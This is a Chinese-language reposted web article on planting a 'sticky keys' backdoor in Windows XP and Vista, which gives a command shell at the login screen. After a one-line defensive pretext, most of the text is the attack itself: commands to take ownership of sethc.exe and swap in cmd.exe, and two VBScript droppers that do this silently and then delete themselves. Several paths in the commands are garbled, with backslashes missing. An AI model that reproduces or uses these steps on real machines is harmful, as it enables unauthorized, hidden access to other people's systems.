怎样使用粘滞键打造入侵Vista超级后门
我们来了解一下入侵Vista的后门是怎样制造出来的,这样有利于我们采取相应的安全防护措施,当别人利用此方法入侵你的vista的时候,你就明白其中的原理了.
在Windows操作系统里面连续按下5次Shift键之后,你看看出来了什么?
在windows 2000/xp/Vista下,按shift键5次,可以打开粘置,会运行sethc.exe,而且,在登录界面里也可以打开。这就让人联想到WINDOWS的屏保,将程序替换成cmd.exe后,就可以打开shell了。
一、具体的替换方法:
XP系统:
将安装源光盘弹出(或将硬盘上的安装目录改名)
cd %widnir%system32dllcache
ren sethc.exe *.ex~
cd %widnir%system32
copy /y cmd.exe sethc.exe
Vista系统:
takeown /f c:windowssystem32sethc.exe
cacls c:windowssystem32sethc.exe /G administrator:F
备注:上两步为获得权限的命令,你也可以通过Vista优化大师获得右键菜单的提升权限的功能,然后在sethc.exe文件上面右键直接提升权限。
然后按XP方法替换文件
在登录界面按5此SHIFT,出来cmd shell,然后……
二、后门扩展:
Dim obj, success
Set obj = CreateObject("Ws cript.Shell")
success = obj.run("cmd /c takeown /f %SystemRoot%system32sethc.exe", 0, True)
success = obj.run("cmd /c echo y cacls %SystemRoot%system32sethc.exe /G %USERNAME%:F", 0, True)
success = obj.run("cmd /c copy %SystemRoot%system32cmd.exe %SystemRoot%system32acmd.exe", 0, True)
success = obj.run("cmd /c copy %SystemRoot%system32sethc.exe %SystemRoot%system32asethc.exe", 0, True)
success = obj.run("cmd /c del %SystemRoot%system32sethc.exe", 0, True)
success = obj.run("cmd /c ren %SystemRoot%system32acmd.exe sethc.exe", 0, True)
第二句最有意思了.嘿嘿..自动应答....以前就遇到过类似的问题
再更新,加个自删除、简化代码:
On Error Resume Next
Dim obj, success
Set obj = CreateObject("Ws cript.Shell")
success = obj.run("cmd /c takeown /f %SystemRoot%system32sethc.exe&echo y cacls %SystemRoot%system32sethc.exe /G %USERNAME%:F© %SystemRoot%system32cmd.exe %SystemRoot%system32acmd.exe© %SystemRoot%system32sethc.exe %SystemRoot%system32asethc.exedel %SystemRoot%system32sethc.exeren %SystemRoot%system32acmd.exe sethc.exe", 0, True)
CreateObject("s cripting.FileSystemObject").DeleteFile(Ws cript.s criptName)
三、后门锁扩展:
allyesno注:可以采用cmd 锁 来进行cmdshell的密码验证 嘿嘿。。。
转截请注明:文章来自 pc捍卫者 http://www.pchwz.com
本站发布此文为传递更多信息之目的,不表明pc捍卫者赞同其观点